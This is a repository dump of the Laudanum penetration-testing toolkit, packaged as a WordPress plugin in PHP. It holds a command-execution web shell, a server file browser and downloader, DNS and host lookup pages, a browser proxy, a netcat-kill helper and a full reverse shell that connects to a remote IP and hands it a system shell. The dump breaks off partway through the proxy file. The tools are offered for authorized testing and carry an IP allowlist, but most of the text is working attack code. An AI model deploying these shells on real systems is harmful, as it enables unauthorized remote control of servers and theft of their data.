*/ 196 | $new_dir = $regs[1]; 197 | } else { 198 | /* Relative path, we append it to the current working 199 | * directory. */ 200 | $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; 201 | } 202 | 203 | /* Transform '/./' into '/' */ 204 | while (strpos($new_dir, '/./') !== false) 205 | $new_dir = str_replace('/./', '/', $new_dir); 206 | 207 | /* Transform '//' into '/' */ 208 | while (strpos($new_dir, '//') !== false) 209 | $new_dir = str_replace('//', '/', $new_dir); 210 | 211 | /* Transform 'x/..' into '' */ 212 | while (preg_match('|/\.\.(?!\.)|', $new_dir)) 213 | $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); 214 | 215 | if ($new_dir == '') $new_dir = '/'; 216 | 217 | /* Try to change directory. */ 218 | if (@chdir($new_dir)) { 219 | $_SESSION['cwd'] = $new_dir; 220 | } else { 221 | $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; 222 | } 223 | 224 | } elseif (trim($command) == 'exit') { 225 | logout(); 226 | } else { 227 | 228 | /* The command is not an internal command, so we execute it after 229 | * changing the directory and save the output. */ 230 | chdir($_SESSION['cwd']); 231 | 232 | // We canot use putenv() in safe mode. 233 | if (!ini_get('safe_mode')) { 234 | // Advice programs (ls for example) of the terminal size. 235 | putenv('ROWS=' . $rows); 236 | putenv('COLUMNS=' . $columns); 237 | } 238 | 239 | /* Alias expansion. */ 240 | $length = strcspn($command, " \t"); 241 | $token = substr($command, 0, $length); 242 | if (isset($ini['aliases'][$token])) 243 | $command = $ini['aliases'][$token] . substr($command, $length); 244 | 245 | $io = array(); 246 | $p = proc_open($command, 247 | array(1 => array('pipe', 'w'), 248 | 2 => array('pipe', 'w')), 249 | $io); 250 | 251 | /* Read output sent to stdout. */ 252 | while (!feof($io[1])) { 253 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 254 | ENT_COMPAT, 'UTF-8'); 255 | } 256 | /* Read output sent to stderr. 
*/ 257 | while (!feof($io[2])) { 258 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 259 | ENT_COMPAT, 'UTF-8'); 260 | } 261 | 262 | fclose($io[1]); 263 | fclose($io[2]); 264 | proc_close($p); 265 | } 266 | } 267 | 268 | /* Build the command history for use in the JavaScript */ 269 | if (empty($_SESSION['history'])) { 270 | $js_command_hist = '""'; 271 | } else { 272 | $escaped = array_map('addslashes', $_SESSION['history']); 273 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 274 | } 275 | } 276 | 277 | ?> 278 | 280 | 281 | 282 | Laudanum Shell 283 | 284 | 285 | 323 | 324 | 325 | 326 | 327 |

Laudanum Shell

328 | 329 |
330 | 331 | 340 | 341 |
342 | Authentication 343 | 344 | Login failed, please try again:

' . "\n"; 347 | else 348 | echo "

Please login:

\n"; 349 | ?> 350 | 351 |

Username:

353 | 354 |

Password:

355 | 356 |

357 | 358 | 359 | 360 |
361 | 362 | 363 | 364 |
365 | Current Working Directory: 368 | 369 | 370 |
371 | 378 |

379 | $  381 |

382 |
383 | 384 |

385 | Size: × 389 | 390 | 391 | 392 |

393 | 394 |
395 | 396 | 397 | 398 |
399 | 400 | 401 |
402 |
403 | Copyright © 2014, Kevin Johnson and the Laudanum team.
404 | Updated by Tim Medin.
405 | Get the latest version at laudanum.secureideas.net. 406 |
407 | 408 | 409 | 410 | -------------------------------------------------------------------------------- /laudanum/wordpress/laudanum.php: -------------------------------------------------------------------------------- 1 | 21 | *** Tim Medin 22 | *** 23 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 24 | *** 25 | ******************************************************************************** 26 | *** 27 | *** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with 28 | *** other Word Press plugins, this entire directory should be zipped up for deployment. 29 | *** The templates/ipcheck.php file should be updated with the tester's IP address first. 30 | *** 31 | *** Written by Jason Gillam 32 | *** 33 | ******************************************************************************** 34 | *** This program is free software; you can redistribute it and/or 35 | *** modify it under the terms of the GNU General Public License 36 | *** as published by the Free Software Foundation; either version 2 37 | *** of the License, or (at your option) any later version. 38 | *** 39 | *** This program is distributed in the hope that it will be useful, 40 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 41 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 42 | *** GNU General Public License for more details. 43 | *** 44 | *** You can get a copy of the GNU General Public License from this 45 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 46 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 47 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
48 | *** 49 | ***************************************************************************** */ 50 | 51 | if(!class_exists("WP_Laudanum")) 52 | { 53 | class WP_Laudanum 54 | { 55 | 56 | public function __construct() 57 | { 58 | add_action('admin_menu', array(&$this, 'add_menu')); 59 | } 60 | 61 | public function __activate() 62 | { 63 | 64 | } 65 | 66 | public function __deactivate() 67 | { 68 | 69 | } 70 | 71 | public function add_menu() 72 | { 73 | add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page')); 74 | } 75 | 76 | public function plugin_settings_page() 77 | { 78 | if(!current_user_can('manage_options')) 79 | { 80 | wp_die(__('You do not have sufficient permissions to access this page.')); 81 | } 82 | 83 | include(sprintf("%s/templates/settings.php", dirname(__FILE__))); 84 | } 85 | } 86 | 87 | register_activation_hook(__FILE__, array('WP_Laudanum', 'activate')); 88 | register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate')); 89 | 90 | $wp_laudanum = new WP_Laudanum(); 91 | 92 | if(isset($wp_laudanum)) { 93 | function plugin_settings_link($links) 94 | { 95 | $settings_link = 'Settings'; 96 | array_unshift($links, $settings_link); 97 | return $links; 98 | } 99 | 100 | $plugin = plugin_basename(__FILE__); 101 | add_filter("plugin_action_links_$plugin", 'plugin_settings_link'); 102 | } 103 | 104 | } 105 | 106 | 107 | 108 | ?> -------------------------------------------------------------------------------- /laudanum/wordpress/templates/dns.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides access to DNS on the system. 
20 | *** Written by Tim Medin 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | include 'ipcheck.php'; 41 | 42 | 43 | /* This error handler will turn all notices, warnings, and errors into fatal 44 | * errors, unless they have been suppressed with the @-operator. */ 45 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 46 | /* The @-opertor (used with chdir() below) temporarely makes 47 | * error_reporting() return zero, and we don't want to die in that case. 48 | * We do note the error in the output, though. */ 49 | if (error_reporting() == 0) { 50 | $_SESSION['output'] .= $errstr . "\n"; 51 | } else { 52 | die(' 54 | 55 | 56 | Laudanum PHP DNS Access 57 | 58 | 59 |

Fatal Error!

60 |

' . $errstr . '

61 |

in ' . $errfile . ', line ' . $errline . '.

62 | 63 |
64 |
65 | Copyright © 2014, Kevin Johnson and the Laudanum team.
66 | Written by Tim Medin.
67 | Get the latest version at laudanum.secureideas.net. 68 |
69 | 70 | 71 | '); 72 | } 73 | } 74 | 75 | set_error_handler('error_handler'); 76 | 77 | 78 | /* Initialize some variables we need again and again. */ 79 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 80 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 81 | ?> 82 | 84 | 85 | 86 | Laudanum PHP DNS Access 87 | 88 | 89 | 94 | 95 | 96 | 97 |

DNS Query 0.1

98 |
99 |
100 | DNS Lookup: 101 |

Query: 102 | Type: 117 | 118 |

119 |
120 | 121 | 122 | "; 127 | echo "Result = "; 128 | print_r($result); 129 | echo "Auth NS = "; 130 | print_r($authns); 131 | echo "Additional = "; 132 | print_r($addtl); 133 | echo ""; 134 | } 135 | ?> 136 |
137 |
138 | Copyright © 2014, Kevin Johnson and the Laudanum team.
139 | Written by Tim Medin.
140 | Get the latest version at laudanum.secureideas.net. 141 |
142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/file.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file allows browsing of the file system. 20 | *** Written by Tim Medin 21 | *** 22 | *** 12/28/2013 - updated by Jason Gillam - fixed parent folder. 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | include 'ipcheck.php'; 44 | 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. 
*/ 49 | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP File Browser 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
70 | Written by Tim Medin.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | //set_error_handler('error_handler'); 80 | 81 | 82 | /* Initialize some variables we need again and again. */ 83 | $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; 84 | $file = isset($_GET["file"]) ? $_GET["file"] : ""; 85 | 86 | if ($file != "") { 87 | if(file_exists($file)) { 88 | 89 | $s = split("/", $file); 90 | $filename = $s[count($s) - 1]; 91 | header("Content-type: application/x-download"); 92 | header("Content-Length: ".filesize($file)); 93 | header("Content-Disposition: attachment; filename=\"".$filename."\""); 94 | readfile($file); 95 | die(); 96 | } 97 | } 98 | ?> 99 | 101 | 102 | 103 | Laudanum File Browser 104 | 105 | 106 | 108 | 109 | 110 | 111 |

Laudanum File Browser 0.1

112 | Home
113 | 114 | Directory listing of / "; 123 | $breadcrumb = '/'; 124 | foreach ($dirs as $d) { 125 | if ($d != '') { 126 | $breadcrumb .= $d . "/"; 127 | echo "$d/ "; 128 | } 129 | } 130 | echo ""; 131 | 132 | // translate .. to a real dir 133 | $parentdir = ""; 134 | for ($i = 0; $i < count($dirs) - 2; $i++) { 135 | $parentdir .= $dirs[$i] . "/"; 136 | } 137 | 138 | echo ""; 139 | echo ""; 140 | echo ""; 141 | 142 | //get listing, separate into directories and files 143 | $listingfiles = array(); 144 | $listingdirs = array(); 145 | 146 | if ($handle = @opendir($curdir)) { 147 | while ($o = readdir($handle)) { 148 | if ($o == "." || $o == "..") continue; 149 | if (@filetype($curdir . $o) == "dir") { 150 | $listingdirs[] = $o . "/"; 151 | } 152 | else { 153 | $listingfiles[] = $o; 154 | } 155 | } 156 | 157 | @natcasesort($listingdirs); 158 | @natcasesort($listingfiles); 159 | 160 | //display directories 161 | foreach ($listingdirs as $f) { 162 | echo ""; 163 | } 164 | 165 | //display files 166 | foreach ($listingfiles as $f) { 167 | echo ""; 168 | } 169 | } 170 | else { 171 | echo ""; 172 | } 173 | ?> 174 |
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

175 |
176 |
177 | Copyright © 2014, Kevin Johnson and the Laudanum team.
178 | Written by Tim Medin.
179 | Get the latest version at laudanum.secureideas.net. 180 |
181 | 182 | 183 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/host.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a host lookup by ip address. 20 | *** Written by Jason Gillam 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | include 'ipcheck.php'; 41 | 42 | 43 | /* This error handler will turn all notices, warnings, and errors into fatal 44 | * errors, unless they have been suppressed with the @-operator. */ 45 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 46 | /* The @-opertor (used with chdir() below) temporarely makes 47 | * error_reporting() return zero, and we don't want to die in that case. 48 | * We do note the error in the output, though. 
*/ 49 | if (error_reporting() == 0) { 50 | $_SESSION['output'] .= $errstr . "\n"; 51 | } else { 52 | die(' 54 | 55 | 56 | Laudanum PHP Hostname by IP Lookup 57 | 58 | 59 |

Fatal Error!

60 |

' . $errstr . '

61 |

in ' . $errfile . ', line ' . $errline . '.

62 | 63 |
64 |
65 | Copyright © 2014, Kevin Johnson and the Laudanum team.
66 | Written by Tim Medin.
67 | Get the latest version at laudanum.secureideas.net. 68 |
69 | 70 | 71 | '); 72 | } 73 | } 74 | 75 | set_error_handler('error_handler'); 76 | 77 | 78 | /* Initialize some variables we need again and again. */ 79 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 80 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 81 | ?> 82 | 84 | 85 | 86 | Laudanum Host Lookup 87 | 88 | 89 | 94 | 95 | 96 | 97 |

Host Lookup 0.1

98 |
99 |
100 | Host Lookup: 101 |

IP: 102 | 103 | 104 |

105 |
106 | 107 | 108 | "; 113 | echo "Result = "; 114 | print_r($result); 115 | echo ""; 116 | } 117 | ?> 118 |
119 |
120 | Copyright © 2014, Kevin Johnson and the Laudanum team.
121 | Written by Tim Medin.
122 | Get the latest version at laudanum.secureideas.net. 123 |
124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/ipcheck.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools 20 | *** by someone other than the person who uploaded Laudanum. This file should be included 21 | *** in other Laudanum tools and not called directly. 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
***
***************************************************************************** */


// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
// Access control shared by the other templates, which `include 'ipcheck.php'`
// before doing anything else: a request is accepted only if its source
// address is one of these literal strings. The comparison below is exact
// string equality, so every permitted address must be listed individually
// (no ranges, no wildcards).
$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");


# *********** No editable content below this line **************

// Set to 1 as soon as REMOTE_ADDR equals one list entry. The loop does not
// break early, but a later mismatch never resets the flag to 0.
$wpl_allowed = 0;
foreach ($wpl_allowedIPs as $IP) {
    // NOTE(review): REMOTE_ADDR is the immediate TCP peer. Behind a reverse
    // proxy or load balancer it is the proxy's address, not the client's —
    // confirm the deployment topology before relying on this list.
    if ($_SERVER["REMOTE_ADDR"] == $IP)
        $wpl_allowed = 1;
}

// Fail closed: any address not on the list receives a bare 404 and the
// including script terminates here, so none of its own logic runs.
if ($wpl_allowed == 0) {
    header("HTTP/1.0 404 Not Found");
    die();
}

?>
-------------------------------------------------------------------------------- /laudanum/wordpress/templates/killnc.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file attempts to kill all netcat processes spawned by the current user. 20 | *** This may be useful in cases where a reverse shell attempt has gone wrong. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details.
34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | include 'ipcheck.php'; 44 | 45 | 46 | /* This error handler will turn all notices, warnings, and errors into fatal 47 | * errors, unless they have been suppressed with the @-operator. */ 48 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 49 | /* The @-opertor (used with chdir() below) temporarely makes 50 | * error_reporting() return zero, and we don't want to die in that case. 51 | * We do note the error in the output, though. */ 52 | if (error_reporting() == 0) { 53 | $_SESSION['output'] .= $errstr . "\n"; 54 | } else { 55 | die(' 57 | 58 | 59 | Laudanum PHP Hostname by IP Lookup 60 | 61 | 62 |

Fatal Error!

63 |

' . $errstr . '

64 |

in ' . $errfile . ', line ' . $errline . '.

65 | 66 |
67 |
68 | Copyright © 2014, Kevin Johnson and the Laudanum team.
69 | Written by Tim Medin.
70 | Get the latest version at laudanum.secureideas.net. 71 |
72 | 73 | 74 | '); 75 | } 76 | } 77 | 78 | set_error_handler('error_handler'); 79 | 80 | 81 | 82 | ?> 83 | 85 | 86 | 87 | Laudanum Kill nc 88 | 89 | 90 | 91 | 92 |

Kill nc 0.1

93 | 94 | 95 |
96 |
97 | Copyright © 2014, Kevin Johnson and the Laudanum team.
98 | Written by Tim Medin.
99 | Get the latest version at laudanum.secureideas.net. 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 111 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 112 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 113 | ); 114 | 115 | $process = proc_open($shell, $descriptorspec, $pipes); 116 | 117 | if (!is_resource($process)) { 118 | printit("ERROR: Can't spawn shell"); 119 | exit(1); 120 | } 121 | 122 | // Set everything to non-blocking 123 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 124 | stream_set_blocking($pipes[0], 0); 125 | stream_set_blocking($pipes[1], 0); 126 | stream_set_blocking($pipes[2], 0); 127 | stream_set_blocking($sock, 0); 128 | 129 | printit("Successfully opened reverse shell to $ip:$port"); 130 | 131 | while (1) { 132 | // Check for end of TCP connection 133 | if (feof($sock)) { 134 | printit("ERROR: Shell connection terminated"); 135 | break; 136 | } 137 | 138 | // Check for end of STDOUT 139 | if (feof($pipes[1])) { 140 | printit("ERROR: Shell process terminated"); 141 | break; 142 | } 143 | 144 | // Wait until a command is end down $sock, or some 145 | // command output is available on STDOUT or STDERR 146 | $read_a = array($sock, $pipes[1], $pipes[2]); 147 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 148 | 149 | // If we can read from the TCP socket, send 150 | // data to process's STDIN 151 | if (in_array($sock, $read_a)) { 152 | if ($debug) printit("SOCK READ"); 153 | $input = fread($sock, $chunk_size); 154 | if ($debug) printit("SOCK: $input"); 155 | fwrite($pipes[0], $input); 156 | } 157 | 158 | // If we can read from the process's STDOUT 159 | // send data down tcp connection 160 | if (in_array($pipes[1], 
$read_a)) { 161 | if ($debug) printit("STDOUT READ"); 162 | $input = fread($pipes[1], $chunk_size); 163 | if ($debug) printit("STDOUT: $input"); 164 | fwrite($sock, $input); 165 | } 166 | 167 | // If we can read from the process's STDERR 168 | // send data down tcp connection 169 | if (in_array($pipes[2], $read_a)) { 170 | if ($debug) printit("STDERR READ"); 171 | $input = fread($pipes[2], $chunk_size); 172 | if ($debug) printit("STDERR: $input"); 173 | fwrite($sock, $input); 174 | } 175 | } 176 | 177 | fclose($sock); 178 | fclose($pipes[0]); 179 | fclose($pipes[1]); 180 | fclose($pipes[2]); 181 | proc_close($process); 182 | 183 | // Like print, but does nothing if we've daemonised ourself 184 | // (I can't figure out how to redirect STDOUT like a proper daemon) 185 | function printit ($string) { 186 | if (!$daemon) { 187 | print "$string\n"; 188 | } 189 | } 190 | 191 | ?> 192 | 193 | 194 | 195 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/proxy.php: -------------------------------------------------------------------------------- 1 | 15 | *** 16 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 17 | *** 18 | ******************************************************************************** 19 | *** 20 | *** This file acts as a browser-based proxy. 21 | *** Written by Tim Medin 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page 42 | // figure out how to reuse sessionid from the remote site 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Proxy 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |
68 |
69 | Copyright © 2014, Kevin Johnson and the Laudanum team.
70 | Written by Tim Medin.
71 | Get the latest version at laudanum.secureideas.net. 72 |
73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | set_error_handler('error_handler'); 80 | 81 | function geturlarray($u) { 82 | // creates the url array, addes a scheme if it is missing and retries parsing 83 | $o = parse_url($u); 84 | if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } 85 | if (!isset($o["path"])) { $o["path"] = "/"; } 86 | return $o; 87 | } 88 | 89 | function buildurl ($u) { 90 | // build the url from the url array 91 | // this is used because the built in function isn't 92 | // avilable in all installs of php 93 | if (!isset($u["host"])) { return null; } 94 | 95 | $s = isset($u["scheme"]) ? $u["scheme"] : "http"; 96 | $s .= "://" . $u["host"]; 97 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 98 | $s .= isset($u["path"]) ? $u["path"] : "/"; 99 | $s .= isset($u["query"]) ? "?" . $u["query"] : ""; 100 | $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; 101 | return $s; 102 | } 103 | 104 | function buildurlpath ($u) { 105 | //gets the full url and attempts to remove the file at the end of the url 106 | // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ 107 | if (!isset($u["host"])) { return null; } 108 | 109 | $s = isset($u["scheme"])? $u["scheme"] : "http"; 110 | $s .= "://" . $u["host"]; 111 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 112 | 113 | $path = isset($u["path"]) ? $u["path"] : "/"; 114 | // is the last portion of the path a file or a dir? 115 | // assume if there is a . it is a file 116 | // if it ends in a / then it is a dir 117 | // if neither, than assume dir 118 | $dirs = explode("/", $path); 119 | $last = $dirs[count($dirs) - 1]; 120 | if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { 121 | // its a file, remove the last chunk 122 | $path = substr($path, 0, -1 * strlen($last)); 123 | } 124 | 125 | $s .= $path; 126 | return $s; 127 | } 128 | 129 | function getfilename ($u) { 130 | // returns the file name 131 | // e.g. 
http://blah.com/dir/file.ext returns file.ext 132 | // technically, it is the last portion of the url, so there is a potential 133 | // for a problem if a http://blah.com/dir returns a file 134 | $s = explode("/", $u["path"]); 135 | return $s[count($s) - 1]; 136 | } 137 | 138 | function getcontenttype ($headers) { 139 | // gets the content type 140 | foreach($headers as $h) { 141 | if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { 142 | return $out[1][0]; 143 | } 144 | } 145 | } 146 | 147 | function getcontentencoding ($headers) { 148 | foreach ($headers as $h) { 149 | if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { 150 | return $out[1][0]; 151 | } 152 | } 153 | } 154 | 155 | function removeheader($header, $headers) { 156 | foreach (array_keys($headers) as $key) { 157 | if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { 158 | unset($headers[$key]); 159 | return $headers; 160 | } 161 | } 162 | } 163 | 164 | function rewritecookies($headers) { 165 | // removes the path and domain from cookies 166 | for ($i = 0; $i < count($headers); $i++) { 167 | if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { 168 | $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); 169 | $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); 170 | } 171 | } 172 | return $headers; 173 | } 174 | 175 | function getsessionid($headers) { 176 | for ($i = 0; $i < count($headers); $i++) { 177 | if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) 178 | return $out[1][0]; 179 | } 180 | return "0"; 181 | } 182 | 183 | function compatible_gzinflate($gzData) { 184 | if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { 185 | $i = 10; 186 | $flg = ord( substr($gzData, 3, 1) ); 187 | if ( $flg > 0 ) { 188 | if ( $flg & 4 ) { 189 | list($xlen) = unpack('v', substr($gzData, $i, 2) ); 190 | $i = $i + 2 + $xlen; 191 | } 192 | if ( $flg & 8 ) 193 | $i = strpos($gzData, "\0", $i) + 1; 194 | if ( $flg 
